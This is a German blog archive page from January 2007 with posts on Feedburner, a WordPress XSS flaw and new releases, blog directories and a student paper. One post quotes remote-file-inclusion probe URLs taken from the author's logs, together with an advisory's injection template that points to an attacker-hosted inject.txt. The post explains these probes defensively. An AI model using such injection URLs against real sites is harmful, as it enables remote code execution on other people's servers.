Software Guide

Die besten Tipps, Anleitungen und Downloads

Ihre Werbung auf Software Guide

Sie möchten in dieser Box oder an anderer Stelle dieser Webseiten eine Werbung schalten? Sehen Sie sich dazu am besten einfach mal die verschiedenen Möglichkeiten an.


Blog-Beiträge vom Monat Januar 2007 (Seite 3/3)

Feedburner: Erweiterte Statistik und Datenschutzproblem

5. Januar 2007 von Michael | Webmaster/CMS/Blog

Wie Manuela berichtet, kann man mit Feedburner nun auch Webseitenstatistiken wie etwa Page Impressions, Besucherdetails, etc. aufzeichnen lassen. Sie erklärt, wie man dieses neue Feature aktiviert.

Hirnrinde berichtet, wie einfach man Feed-Abonnenten-Zahlen von fremden Blogs auslesen kann, auch wenn diese dies nicht wollen. So hat Stefan mal eben zum Testen die Feed-Statistik von Dr. Web und Bildblog ausgelesen. Tja, dies ist wohl die Krux, wenn man Dienste wie den Feed an kostenlose Dienste outsourct. Mich persönlich nervt es nicht, wenn andere diese Zahlen meiner Blogs auslesen können, aber ich kann mir durchaus vorstellen, dass es Projekte gibt, bei denen dies nicht gewünscht ist.


Strategien für den Umgang mit Polizei und Staatsanwalt

4. Januar 2007 von Michael | Entspannung

Vom Law-Blogger Udo Vetter gibt es einen sehr unterhaltsamen und interessanten Video-Vortrag auf Google Video: Sie haben das Recht zu schweigen. Das ganze war ein Vortrag im Rahmen des 23rd Chaos Communication Congress.
Weiterlesen…


Gute und schlechte Neuigkeit zu WordPress

4. Januar 2007 von Michael | Wordpress

WordPress 2.1 Beta1 Download:

Ja, es gibt nun die erste Beta-Version zu WordPress 2.1, Direktdownload (zip, 835k). Habe ich bei teezeh dot de gelesen, der gleich schon mal upgegraded hat, eine offizielle Ankündigung gab es aber wohl (noch) nicht.

WordPress Sicherheitslücke:

Frank Bültge weist auf eine WordPress-Sicherheitslücke hin, die alle aktuellen WordPress-Versionen einschließlich 2.0.5 betrifft, wobei Frank schreibt, dass der Fehler auch in der 2.0.6 beta 1 nicht behoben ist.

Bekannt ist diese Lücke wohl schon seit dem 27. Dezember, wie man bei dem Entdecker (?) Operation n nachlesen kann. techbuzz listet alle betroffenen stabilen WordPress-Versionen.

Einen Patch kann man im WordPress-Trac downloaden, oder man folgt den Anweisungen von Frank.

Es handelt sich hierbei übrigens um eine sog. XSS-Lücke, welche grundsätzlich sehr ernst zu nehmen sind.

  • Update (Fr 5. Januar 2007):
    Mittlerweile wurde WordPress 2.0.6 herausgebracht und kann hier heruntergeladen werden, diese Version enthält diese Sicherheitslücke nicht mehr.
    Zudem soll WordPress 2.1 auch bald kommen, wie Matt schreibt. In mehreren Blogs liest man, die finale Version soll angeblich noch in diesem Monat kommen.
  • Update (So 7. Januar 2007):
    Mit WordPress 2.0.6 kann es Probleme geben, wenn man den Webservice Feedburner nutzt. Eine Lösung gibt es bei neosmart.net. Im Prinzip muss man 3 Zeilen der Datei wp-includes/functions.php auskommentieren, man kann auch einfach die bereits modifizierte functions.php hier herunterladen und mit der bestehenden ersetzen.

WordPress: Attacken wegen aktivierter Permalinks

2. Januar 2007 von Michael | Wordpress

Erst kürzlich habe ich das WordPress-Plugin Log 404 installiert. Dieses Plugin zeichnet die 100 letzten 404-Fehler („Webseite nicht gefunden“) auf und ist damit eine prima Admin-Unterstützung, um tote Links aufzuspüren, die man ggf. umbiegen sollte, weil regelmäßig darauf zugegriffen wird.

Ich habe das Plugin ein paar Tagen im Einsatz und stelle nun immer wieder Massen-Zugriffe auf folgenden Pfad fest:

sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://artelj.com/c.ar?
sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://empzone.com/c.ar??

Bei Software Guide gibt es weder den Verzeichnispfad /wordpress/lib_comment/ noch gibt es dort diese comment.php. Googlen nach lib_comment/comment.php?doc_directory bringt aber einschlägige Ergebnisse zu Tage:

OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/comment.php not properly sanitizing user input supplied to the ‚doc_directory‘ variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
(…)
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
(…)
http://[target]/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=
http://[attacker]/inject.txt?

Was bedeutet das jetzt?
Weiterlesen…


Die ewige Diskussion: Ist ein Blog ohne Kommentare wirklich ein Blog?

1. Januar 2007 von Michael | Webmaster/CMS/Blog

Techcrunch hat mit What Is The Definition Of A Blog? mal wieder die Frage aufgeworfen, ob ein Blog ohne Kommentarmöglichkeit wirklich ein Blog ist. Hierzulande wird in diesem Zusammenhang immer das Bildblog genannt, das ja sogar Blog als Namensbestandteil hat, aber keine Kommentare zulässt.

Interessant dabei ist, dass Techcrunch eine Umfrage dazu gemacht hat, und die Meinungen gehen sehr auseinander, hier der aktuelle Stand:
Umfrage

Übersetzung:

Ist ein Blog wirklich ein Blog, wenn Leser nicht kommentieren können?
a) Kommentare sind nicht notwendig, aber erweitern den Content erheblich
b) Kommentare sind nicht notwendig für Blogs
c) Ohne Kommentare ist es kein Blog

Ich habe für (c) gestimmt, da ich unter „Blog“ nicht nur ein stupides Artikel-Veröffentlichen verstehe ohne Kommunikation mit dem Leser. Ich finde Blogs schon oftmals tot und keine echten Blogs, wenn man sich zum kommentieren registrieren muss wie in einem Forum. Die Meinungen in der Techcrunch-Umfrage gehen jedenfalls weit auseinander. Aber letztendlich ist es ja nur eine Begrifflichkeit.


Blogalm.de: Neues Blog-Verzeichnis

1. Januar 2007 von Michael | Webservice

BlogalmFrank Helmschrott hat mit Blogalm ein neues Blogverzeichnis eröffnet. Er schreibt dazu:

Die BlogAlm ist ein Blogverzeichnis im klassischen Stil. Ein Webverzeichnis speziell für deutschsprachige Blogs. Ich versuche mit der BlogAlm sowohl Besuchern als auch Blogbetreibern gerecht zu werden.

Für Besucher bietet sich ein übersichtliches Verzeichnis – wie üblich nach Kategorien sortiert. Einzelne Blogeinträge enthalten bereits in der Übersicht neben dem Titel eine Beschreibung und einen kleinen Screenshot. In der Detailansicht ist der Screenshot dann noch größer und deutlicher und die neuesten Headlines aus dem Feed des Blogs bieten einen ersten Einblick in die Inhalte.

Dem Blogbetreiber steht ein – selbstverständlich kostenloses – Verzeichnis zur Verfügung in das er seinen Blog binnen weniger Minuten eintragen kann. Nach erfolgter Freischaltung (Stichwort Qualitätskontrolle – Baustellen und Spamblogs haben keine Chance) wird sein Blog im Verzeichnis suchmaschinenwirksam gelistet (ausschließlich direkte Links, keine Maskierung).

Klingt wirklich interessant. Ich hab mich eben angemeldet und Software Guide dort erfasst. Der Anmeldevorgang war schnell erledigt und das Blog auch flink freigegeben. Wobei die Freigabe sicherlich zukünftig auch etwas dauern kann, weil er jede Anmeldung moderiert — was aber nur zum Vorteil von allen ist, um Spam erst gar nicht aufkommen zu lassen.


Warnung vor der Projektarbeit über Corporate Weblogs

1. Januar 2007 von Michael | Webmaster/CMS/Blog

4 Studentinnen der Rheinischen Fachhochschule Köln haben eine Projektarbeit über Corporate Weblogs geschrieben, Download (PDF, 7MB) (Download wurde entfernt).

Ich habe die ersten Seiten der Arbeit mehr oder weniger überflogen. Sie macht oberflächlich einen guten Eindruck, liest man sich allerdings weiter ein, so werden manche Punkte meines Erachtens nicht richtig dargestellt.

Bei einer Passage hat es mich aber eben fast vom Stuhl gehauen und ich musste dreimal nachlesen, und zwar diese von Seite 38, wo zuvor noch Archiv-Blogs erklärt wurden:

Archivierung deutschsprachiger Blogs:
Der Law-Blog
Dieser Weblog, gegründet von Udo Vetter, stellt ein umfassendes Archiv deutschsprachiger Blogs zur Verfügung (siehe Abb. 22). Ein thematisch zutreffender Blog kann innerhalb des Law-Blogs bis zu 20.000 verschiedene Beiträge chronologisch archivieren. Der Law-Blog wird kostenlos zur Verfügung gestellt und ermöglicht den Bloggern ihre Beiträge an einem zentralen Punkt zu speichern. Neben einer Informationsvermittlung soll der Law-Blog auch eine Diskussionsplattform für angesprochene Themen sein. Die Betreiber des Law-Blogs weisen in ihren allgemeinen Geschäftsbedingungen darauf hin, dass detaillierte Rechtsfragen im Law-Blog nicht geklärt werden können, ergo Angaben innerhalb des Blogs die Konsultation eines Rechtsanwaltes nicht ersetzen.

Es wird dabei auf den Lawblog-Beitrag Textdiebe verwiesen. Sorry, aber aber das ist schlichtweg falsch. Lawblog hat in dem Artikel nur das Impressum eines (mittlerweile aufgelösten) Blogs zitiert und dazu Stellung bezogen. Dieses Archiv-Blog hatte unzählige Weblog-Inhalte unerlaubt bei sich gelistet, ich berichtete darüber am 08.05.2006 unter Dreister Content-Klau.

Als Einleitung werden auf Seite 38 Archiv-Blogs erklärt:

Archivblogs sind innerhalb von manchen Corporate Blogs verankert. Wie der Name schon sagt, archivieren diese Blogs die bereits bestehenden, um so eine ideale Informationsvermittlung zu ermöglichen. (…)

Nochmal: Diese sog. „Archiv-Blogs“ eignen sich unbefugt Content an (z.B. über RSS-Feeds) um dann z.B. über Anzeigenschaltung Geld zu verdienen, dies hat nichts mit Corporate Blogs zu tun.

Diese Falschaussagen zeigen, dass in keinster Weise gut recherchiert wurde. Ich habe mir diese Arbeit jetzt nicht mehr weiter angesehen, weiß also nicht ob noch weitere Hämmer enthalten sind.

Nachtrag: Der Download wurde mittlerweile vom Netz genommen.

Blog-Kategorien

Volltextsuche

Neueste Artikel

Neueste Kommentare

Neueste Trackbacks/Pingbacks

Andere Projekte

Blogparade

dient als zentrale Anlaufstelle für Blog-Paraden bzw. Blog-Karnevals und andere von BloggerInnen veranstaltete Aktionen.

Mediadaten

Feed-Statistik:
Feedburner

Software Guide gibt es seit Dezember 2005 und es werden durchschnittlich 2 Blog- Beiträge/Monat veröffentlicht. Die Themenschwerpunkte sind in der Tagcloud ersichtlich. Mehr Infos...

Links

 

Nach oben

Wordpress

© 2005-2024 Software Guide | ISSN 1864-9599